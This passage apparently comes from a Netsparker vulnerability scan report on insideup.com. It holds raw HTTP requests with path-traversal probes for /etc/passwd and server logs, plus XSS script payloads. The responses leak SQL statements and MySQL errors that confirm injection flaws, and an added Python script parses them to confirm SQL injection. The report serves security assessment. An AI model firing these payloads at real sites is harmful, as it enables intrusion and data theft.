Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:24:00 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=43f3p921lbu0lt09k7m11q6h40; path=/
Content-Length: 3253
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId='"--></style></script><script>netsparker(0x0005BC)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/meac00/project.php?catId='"--></style></script><script>netsparker(0x0005BC)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId='"--></style></script><script>netsparker(0x0005BC)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/meac00/project.php?catId='"--></style></script><script>netsparker(0x0005BC)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId='"--></style></script><script>netsparker(0x0005BC)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/meac00/project.php?catId='"--></style></script><script>netsparker(0x0005BC)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join 
lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId='"--></style></script><script>netsparker(0x0005BC)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/meac00/project.php?catId='"--></style></script><script>netsparker(0x0005BC)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId='"--></style></script><script>netsparker(0x0005BC)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/meac00/project.php?catId='"--></style></script><script>netsparker(0x0005BC)</script>&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005BC)</script>&iusrc=iupsc/' union sel' at line 5
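Every CONFIRMED entry on this page rests on the same evidence: a 200 OK whose body carries the application's own SELECT with the scanner's marker sitting inside a string literal, followed by MySQL's syntax error quoting that same marker in its "near" fragment. The script below is an added example, not part of the report and not code from insideup.com; it applies that check to a response body and also pulls out what the error leaks (the sink column, the tables named in the statement, the line number). SAMPLE_BODY is a shortened, constructed copy of the 0x0005BC response above; the marker format and the MySQL message text the regexes look for are assumptions drawn from this page.

```python
import re

# Constructed sample: an abridged copy of the body the scanner recorded for
# /ppc/leadflow/meac00/project.php (marker 0x0005BC). The real body repeats the
# SELECT once per lead_flow_*_pages_details table; two copies are enough here.
SAMPLE_BODY = (
    "select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url "
    "from lead_flow_one_pages_details prj "
    "left join lead_flow_group grps on grps.group_id = prj.groupId "
    "where prj.project_page_url = 'leadflow/meac00/project.php?catId='\"--></style></script>"
    "<script>netsparker(0x0005BC)</script>&iusrc=iupsc' "
    "union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url "
    "from lead_flow_two_pages_details prj "
    "where prj.project_page_url = 'leadflow/meac00/project.php?catId='\"--></style></script>"
    "<script>netsparker(0x0005BC)</script>&iusrc=iupsc/'"
    "You have an error in your SQL syntax; check the manual that corresponds to your "
    "MySQL server version for the right syntax to use near '></style></script>"
    "<script>netsparker(0x0005BC)</script>&iusrc=iupsc/' union sel' at line 5"
)

# MySQL's syntax-error text, as it appears verbatim in every response on this page.
MYSQL_SYNTAX_ERROR = re.compile(
    r"You have an error in your SQL syntax;.*?"
    r"for the right syntax to use near '(?P<near>.*?)' at line (?P<line>\d+)",
    re.S,
)
# Netsparker's reflection marker, e.g. netsparker(0x0005BC) (assumed format).
MARKER = re.compile(r"netsparker\(0x([0-9A-Fa-f]{6})\)")
# Table names following FROM in the leaked statement.
FROM_TABLE = re.compile(r"\bfrom\s+([A-Za-z_][A-Za-z0-9_]*)", re.I)
# Heuristic: the column whose quoted literal the marker landed in.
SINK = re.compile(r"([A-Za-z_][\w.]*)\s*=\s*'\S{0,120}?netsparker\(")


def triage(body, expected_marker):
    """Decide whether a response body confirms error-based SQL injection.

    Confirmed means: a MySQL syntax error is present AND the expected marker
    appears both in the reflected statement and inside the error's "near"
    fragment, i.e. the server parsed our input as SQL rather than just echoing it.
    """
    err = MYSQL_SYNTAX_ERROR.search(body)
    if not err:
        return {"confirmed": False, "reason": "no MySQL syntax error in body"}
    leaked_sql = body[: err.start()]          # everything before the error text
    near = err.group("near")
    want = expected_marker.upper()
    reflected = {m.upper() for m in MARKER.findall(leaked_sql)}
    in_error = want in {m.upper() for m in MARKER.findall(near)}
    sink = SINK.search(leaked_sql)
    return {
        "confirmed": want in reflected and in_error,
        "error_line": int(err.group("line")),
        "near": near,
        "sink_column": sink.group(1) if sink else None,
        "tables": sorted({t.lower() for t in FROM_TABLE.findall(leaked_sql)}),
        "leaked_sql_bytes": len(leaked_sql),
    }


if __name__ == "__main__":
    print(triage(SAMPLE_BODY, "0005BC"))
```

Run against a captured body and the scanner's marker id for that request; a hit on the error text alone is not treated as confirmation, the marker has to be inside the quoted "near" fragment, which rules out pages that merely display a stale error.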
- /ppc/leadflow/meac00/project.php

/ppc/leadflow/meac00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/meac00/project.php?catId=30008&iusrc='%22--%3E%3C/style%3E%3C/s..

Parameters

Parameter Type Value
catId GET 30008
iusrc GET '"--></style></script><script>alert(0x0005BD)</script>

Request

GET /ppc/leadflow/meac00/project.php?catId=30008&iusrc='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005BD)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:24:02 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=h850kqs1fbj9m8e8c866ltskl0; path=/
Content-Length: 3253
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='"--></style></script><script>netsparker(0x0005BD)</script>' OR prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='"--></style></script><script>netsparker(0x0005BD)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='"--></style></script><script>netsparker(0x0005BD)</script>' OR prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='"--></style></script><script>netsparker(0x0005BD)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='"--></style></script><script>netsparker(0x0005BD)</script>' OR prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='"--></style></script><script>netsparker(0x0005BD)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join 
lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='"--></style></script><script>netsparker(0x0005BD)</script>' OR prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='"--></style></script><script>netsparker(0x0005BD)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='"--></style></script><script>netsparker(0x0005BD)</script>' OR prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='"--></style></script><script>netsparker(0x0005BD)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005BD)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/inco00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005BB)%3C/script%3E

/ppc/leadflow/inco00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005BB)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/inco00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x0005BB)</script>

Request

GET /ppc/leadflow/inco00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005BB)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/inco00/project.php?catId=60003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 